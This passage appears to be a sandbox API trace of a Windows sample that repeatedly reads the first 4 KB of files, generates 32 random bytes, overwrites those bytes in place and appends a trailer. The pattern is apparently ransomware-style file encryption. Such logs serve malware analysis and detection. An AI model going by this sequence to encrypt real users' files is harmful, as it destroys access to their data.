GetProcessHeap () returned 0x4f10000 [0076.701] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56528 [0076.701] SystemFunction036 (in: RandomBuffer=0x7d56528, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56528) returned 1 [0076.701] GetProcessHeap () returned 0x4f10000 [0076.701] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b610d8 [0076.701] ReadFile (in: hFile=0x780, lpBuffer=0x8b610d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesRead=0x84afd08*=0x1000, lpOverlapped=0x0) returned 1 [0076.819] SetFilePointerEx (in: hFile=0x780, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.819] WriteFile (in: hFile=0x780, lpBuffer=0x8b610d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesWritten=0x84afd44*=0x1000, lpOverlapped=0x0) returned 1 [0076.820] GetProcessHeap () returned 0x4f10000 [0076.820] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0076.820] GetProcessHeap () returned 0x4f10000 [0076.820] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0076.820] GetProcessHeap () returned 0x4f10000 [0076.820] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d560a0 [0076.820] GetProcessHeap () returned 0x4f10000 [0076.820] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0076.820] GetProcessHeap () returned 0x4f10000 [0076.820] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56870 [0076.820] GetProcessHeap () returned 0x4f10000 [0076.820] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0076.820] GetProcessHeap () returned 0x4f10000 [0076.820] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.820] GetProcessHeap () returned 0x4f10000 [0076.820] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.820] GetProcessHeap () returned 0x4f10000 [0076.820] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.820] GetProcessHeap () returned 0x4f10000 [0076.820] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.820] GetProcessHeap () returned 0x4f10000 [0076.820] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.820] GetProcessHeap () returned 0x4f10000 [0076.820] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.820] GetProcessHeap () returned 0x4f10000 [0076.820] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.820] GetProcessHeap () returned 0x4f10000 [0076.820] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.820] GetProcessHeap () returned 0x4f10000 [0076.820] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.820] GetProcessHeap () returned 0x4f10000 [0076.820] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.820] GetProcessHeap () returned 0x4f10000 [0076.820] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.820] GetProcessHeap () returned 0x4f10000 [0076.821] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.821] GetProcessHeap () returned 0x4f10000 [0076.821] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.821] GetProcessHeap () returned 0x4f10000 [0076.821] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.821] GetProcessHeap () returned 0x4f10000 [0076.821] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.821] GetProcessHeap () returned 0x4f10000 [0076.821] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.821] GetProcessHeap () returned 0x4f10000 [0076.821] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.821] GetProcessHeap () returned 0x4f10000 [0076.821] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.821] GetProcessHeap () returned 0x4f10000 [0076.821] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.821] GetProcessHeap () returned 0x4f10000 [0076.821] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.821] GetProcessHeap () returned 0x4f10000 [0076.821] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.821] GetProcessHeap () returned 0x4f10000 [0076.821] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.821] GetProcessHeap () returned 0x4f10000 [0076.821] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.821] GetProcessHeap () returned 0x4f10000 [0076.821] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.821] GetProcessHeap () returned 0x4f10000 [0076.821] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.821] GetProcessHeap () returned 0x4f10000 [0076.821] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.821] GetProcessHeap () returned 0x4f10000 [0076.821] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.821] GetProcessHeap () returned 0x4f10000 [0076.821] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.821] GetProcessHeap () returned 0x4f10000 [0076.821] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.821] GetProcessHeap () returned 0x4f10000 [0076.821] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.821] GetProcessHeap () returned 0x4f10000 [0076.822] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.822] GetProcessHeap () returned 0x4f10000 [0076.822] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.822] GetProcessHeap () returned 0x4f10000 [0076.822] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0076.822] GetProcessHeap () returned 0x4f10000 [0076.822] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.822] GetProcessHeap () returned 0x4f10000 [0076.822] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0076.822] GetProcessHeap () returned 0x4f10000 [0076.822] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0076.822] GetProcessHeap () returned 0x4f10000 [0076.822] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0076.822] GetProcessHeap () returned 0x4f10000 [0076.822] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0076.822] GetProcessHeap () returned 0x4f10000 [0076.822] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0076.822] GetProcessHeap () returned 0x4f10000 [0076.822] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0076.822] GetProcessHeap () returned 0x4f10000 [0076.822] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0076.822] GetProcessHeap () returned 0x4f10000 [0076.822] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0076.822] GetProcessHeap () returned 0x4f10000 [0076.822] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0076.822] GetProcessHeap () returned 0x4f10000 [0076.822] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0076.822] GetProcessHeap () returned 0x4f10000 [0076.822] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0076.822] GetProcessHeap () returned 0x4f10000 [0076.822] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0076.822] GetProcessHeap () returned 0x4f10000 [0076.822] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0076.823] GetProcessHeap () returned 0x4f10000 [0076.823] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0076.823] GetProcessHeap () returned 0x4f10000 [0076.823] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0076.823] GetProcessHeap () returned 0x4f10000 [0076.823] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0076.823] GetProcessHeap () returned 0x4f10000 [0076.823] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0076.823] GetProcessHeap () returned 0x4f10000 [0076.823] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0076.823] GetProcessHeap () returned 0x4f10000 [0076.823] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0076.823] GetProcessHeap () returned 0x4f10000 [0076.823] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0076.823] GetProcessHeap () returned 0x4f10000 [0076.823] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0076.823] GetProcessHeap () returned 0x4f10000 [0076.823] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0076.823] GetProcessHeap () returned 0x4f10000 [0076.823] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0076.823] GetProcessHeap () returned 0x4f10000 [0076.823] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0076.823] GetProcessHeap () returned 0x4f10000 [0076.823] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0076.823] GetProcessHeap () returned 0x4f10000 [0076.823] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0076.823] GetProcessHeap () returned 0x4f10000 [0076.823] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0076.824] GetProcessHeap () returned 0x4f10000 [0076.824] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0076.824] GetProcessHeap () returned 0x4f10000 [0076.824] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0076.824] GetProcessHeap () returned 0x4f10000 [0076.824] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0076.824] GetProcessHeap () returned 0x4f10000 [0076.824] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0076.824] GetProcessHeap () returned 0x4f10000 [0076.824] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0076.824] GetProcessHeap () returned 0x4f10000 [0076.824] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0076.824] GetProcessHeap () returned 0x4f10000 [0076.824] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0076.824] GetProcessHeap () returned 0x4f10000 [0076.824] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0076.824] GetProcessHeap () returned 0x4f10000 [0076.824] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0076.824] GetProcessHeap () returned 0x4f10000 [0076.824] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0076.824] GetProcessHeap () returned 0x4f10000 [0076.824] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d560a0 | out: hHeap=0x4f10000) returned 1 [0076.824] SetFilePointerEx (in: hFile=0x780, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.824] WriteFile (in: hFile=0x780, lpBuffer=0x7d7f878*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f878*, lpNumberOfBytesWritten=0x84afd44*=0x100, lpOverlapped=0x0) returned 1 [0076.824] WriteFile (in: hFile=0x780, lpBuffer=0x84afd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x84afd48*, lpNumberOfBytesWritten=0x84afd44*=0x4, lpOverlapped=0x0) returned 1 [0076.824] GetProcessHeap () returned 0x4f10000 [0076.825] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b610d8 | out: hHeap=0x4f10000) returned 1 [0076.825] GetProcessHeap () returned 0x4f10000 [0076.825] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0076.825] GetProcessHeap () returned 0x4f10000 [0076.825] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0076.825] CloseHandle (hObject=0x780) returned 1 [0076.826] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 14 [0076.826] SetFilePointerEx (in: hFile=0x774, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.826] ReadFile (in: hFile=0x774, lpBuffer=0x84afd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x84afd4c*, lpNumberOfBytesRead=0x84afd08*=0x0, lpOverlapped=0x0) returned 1 [0076.826] SetFilePointerEx (in: hFile=0x774, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.826] GetProcessHeap () returned 0x4f10000 [0076.826] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0076.826] GetProcessHeap () returned 0x4f10000 [0076.826] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56528 [0076.826] SystemFunction036 (in: RandomBuffer=0x7d56528, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56528) returned 1 [0076.826] GetProcessHeap () returned 0x4f10000 [0076.826] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b610d8 [0076.826] ReadFile (in: hFile=0x774, lpBuffer=0x8b610d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesRead=0x84afd08*=0x1000, lpOverlapped=0x0) returned 1 [0076.911] SetFilePointerEx (in: hFile=0x774, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.911] WriteFile (in: hFile=0x774, lpBuffer=0x8b610d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesWritten=0x84afd44*=0x1000, lpOverlapped=0x0) returned 1 [0076.911] GetProcessHeap () returned 0x4f10000 [0076.911] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0076.911] GetProcessHeap () returned 0x4f10000 [0076.911] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0076.911] GetProcessHeap () returned 0x4f10000 [0076.911] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d560a0 [0076.911] GetProcessHeap () returned 0x4f10000 [0076.911] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0076.911] GetProcessHeap () returned 0x4f10000 [0076.911] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56870 [0076.911] GetProcessHeap () returned 0x4f10000 [0076.911] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0076.911] GetProcessHeap () returned 0x4f10000 [0076.912] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.912] GetProcessHeap () returned 0x4f10000 [0076.912] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.912] GetProcessHeap () returned 0x4f10000 [0076.912] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.912] GetProcessHeap () returned 0x4f10000 [0076.912] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.912] GetProcessHeap () returned 0x4f10000 [0076.912] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.912] GetProcessHeap () returned 0x4f10000 [0076.912] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.912] GetProcessHeap () returned 0x4f10000 [0076.912] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.912] GetProcessHeap () returned 0x4f10000 [0076.912] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.912] GetProcessHeap () returned 0x4f10000 [0076.912] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.912] GetProcessHeap () returned 0x4f10000 [0076.912] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.912] GetProcessHeap () returned 0x4f10000 [0076.912] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.912] GetProcessHeap () returned 0x4f10000 [0076.912] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.912] GetProcessHeap () returned 0x4f10000 [0076.912] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.912] GetProcessHeap () returned 0x4f10000 [0076.912] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.912] GetProcessHeap () returned 0x4f10000 [0076.912] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.912] GetProcessHeap () returned 0x4f10000 [0076.912] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.912] GetProcessHeap () returned 0x4f10000 [0076.912] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.912] GetProcessHeap () returned 0x4f10000 [0076.913] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.913] GetProcessHeap () returned 0x4f10000 [0076.913] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.913] GetProcessHeap () returned 0x4f10000 [0076.913] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.913] GetProcessHeap () returned 0x4f10000 [0076.913] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.913] GetProcessHeap () returned 0x4f10000 [0076.913] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.913] GetProcessHeap () returned 0x4f10000 [0076.913] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.913] GetProcessHeap () returned 0x4f10000 [0076.913] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.913] GetProcessHeap () returned 0x4f10000 [0076.913] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.913] GetProcessHeap () returned 0x4f10000 [0076.913] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.913] GetProcessHeap () returned 0x4f10000 [0076.913] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.913] GetProcessHeap () returned 0x4f10000 [0076.913] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.913] GetProcessHeap () returned 0x4f10000 [0076.913] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.913] GetProcessHeap () returned 0x4f10000 [0076.913] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.913] GetProcessHeap () returned 0x4f10000 [0076.913] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.913] GetProcessHeap () returned 0x4f10000 [0076.913] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.913] GetProcessHeap () returned 0x4f10000 [0076.913] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0076.913] GetProcessHeap () returned 0x4f10000 [0076.913] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.913] GetProcessHeap () returned 0x4f10000 [0076.913] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0076.913] GetProcessHeap () returned 0x4f10000 [0076.913] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0076.914] GetProcessHeap () returned 0x4f10000 [0076.914] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0076.914] GetProcessHeap () returned 0x4f10000 [0076.914] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0076.914] GetProcessHeap () returned 0x4f10000 [0076.914] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0076.914] GetProcessHeap () returned 0x4f10000 [0076.914] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0076.914] GetProcessHeap () returned 0x4f10000 [0076.914] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0076.914] GetProcessHeap () returned 0x4f10000 [0076.914] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0076.914] GetProcessHeap () returned 0x4f10000 [0076.914] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0076.914] GetProcessHeap () returned 0x4f10000 [0076.914] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0076.914] GetProcessHeap () returned 0x4f10000 [0076.914] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0076.914] GetProcessHeap () returned 0x4f10000 [0076.914] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0076.914] GetProcessHeap () returned 0x4f10000 [0076.914] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0076.914] GetProcessHeap () returned 0x4f10000 [0076.914] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0076.914] GetProcessHeap () returned 0x4f10000 [0076.914] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0076.914] GetProcessHeap () returned 0x4f10000 [0076.914] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0076.914] GetProcessHeap () returned 0x4f10000 [0076.914] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0076.915] GetProcessHeap () returned 0x4f10000 [0076.915] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0076.915] GetProcessHeap () returned 0x4f10000 [0076.915] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0076.915] GetProcessHeap () returned 0x4f10000 [0076.915] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0076.915] GetProcessHeap () returned 0x4f10000 [0076.915] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0076.915] GetProcessHeap () returned 0x4f10000 [0076.915] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0076.915] GetProcessHeap () returned 0x4f10000 [0076.915] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0076.915] GetProcessHeap () returned 0x4f10000 [0076.915] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0076.915] GetProcessHeap () returned 0x4f10000 [0076.915] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0076.915] GetProcessHeap () returned 0x4f10000 [0076.915] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) 